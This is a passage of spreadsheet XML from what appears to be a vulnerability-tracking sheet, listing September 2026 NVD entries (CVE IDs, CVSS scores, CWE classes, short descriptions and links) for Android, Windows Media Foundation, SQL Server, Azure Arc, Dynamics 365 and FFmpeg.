      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28618</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30754</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49879</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49882</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K11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1" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
